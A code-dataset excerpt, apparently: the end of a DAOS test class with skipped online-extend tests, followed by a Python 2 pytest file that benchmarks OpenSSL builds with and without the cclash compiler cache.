"""
self.log.info("Online Extend : Without Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_extend_test(1)
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_oclass(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with different
object class.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_oclass
"""
self.log.info("Online Extend : Oclass")
self.run_online_extend_test(1, oclass=self.test_oclass[0])
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_mdtest(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with mdtest application.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_mdtest
"""
self.log.info("Online Extend : Mdtest")
self.run_online_extend_test(1, app_name="mdtest")
@skipForTicket("DAOS-7195,DAOS-7955")
def test_osa_online_extend_with_aggregation(self):
"""Test ID: DAOS-6645
Test Description: Validate Online extend with aggregation on.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_extend,online_extend,online_extend_with_aggregation
"""
self.log.info("Online Extend : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_extend_test(1)
|
test_performance.py
|
"""
Test cclash speed
"""
import sys
import os
import pytest
import subprocess
import threading
import test_performance_openssl as tpo
THISDIR = os.path.dirname(os.path.abspath(__file__))
CCLASH_BIN = os.path.join(os.path.dirname(THISDIR), "cclash", "bin", "debug")
CCLASH_EXE = os.path.join(CCLASH_BIN, "cl.exe")
if not os.path.exists(CCLASH_EXE):
CCLASH_BIN = os.path.join(os.path.dirname(THISDIR), "cclash", "bin", "release")
CCLASH_EXE = os.path.join(CCLASH_BIN, "cl.exe")
def run_server():
"""
Run the cclash server
:return:
"""
envs = setup_cclache_envs()
try:
print subprocess.check_output([CCLASH_EXE, "--cclash-server"], env=envs)
except subprocess.CalledProcessError as cpe:
print cpe.output
raise
def setup_module():
"""
Before all tests
:return:
"""
assert os.path.isfile(CCLASH_EXE), "you need to build a Debug cclash first"
print "cclash is at {}".format(CCLASH_EXE)
tpo.get_vc_envs()
tpo.download_openssl()
setup_module.server = threading.Thread(target=run_server)
setup_module.server.start()
setup_module.server = None
def teardown_module():
"""
Clean up the server
:return:
"""
envs = setup_cclache_envs()
subprocess.check_call([CCLASH_EXE, "--cclash", "--stop"], env=envs)
def setup_function(request):
"""
Before each test
:param request:
:return:
"""
envs = setup_cclache_envs()
tpo.setup_function(request)
print "cachedir {}".format(envs["CCLASH_DIR"])
print subprocess.check_output([CCLASH_EXE, "--cclash"], env=envs)
def setup_cclache_envs():
"""
return a dict of envs suitable for cclache to work with
:return:
"""
envs = dict(tpo.ENVS)
cachedir = os.path.join(os.getcwd(), "cclache_cachedir")
envs["CCLASH_DIR"] = cachedir
envs["CCLASH_Z7_OBJ"] = "yes"
envs["CCLASH_SERVER"] = "1"
return envs
def test_build_nocache():
"""
Time an openssl build with no caching involved at all
:return:
"""
tpo.build_openssl(None)
def build_withcclache_cold():
"""
Time an openssl build with a cold cache
:return:
"""
envs = setup_cclache_envs()
tpo.retry_delete(envs["CCLASH_DIR"])
tpo.build_openssl(CCLASH_BIN, envs)
def test_build_withcclache_01_warm():
"""
Time an openssl build with a warm cache
:return:
"""
#
# Benchmarking on my win10 AMD A6-3500 (3 core).
# On a good run this is 12.5 mins total,
#
# approx 450 sec cold
# approx 120 sec warm
#
# overhead is non-compiler configure or clean time
#
envs = setup_cclache_envs()
print "-" * 80
print "Start cold cache"
print "-" * 80
build_withcclache_cold()
tpo.setup_function(None)
print "-" * 80
print "Start warm cache"
print "-" * 80
tpo.build_openssl(CCLASH_BIN, envs)
if __name__ == "__main__":
pytest.main(sys.argv[1:])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.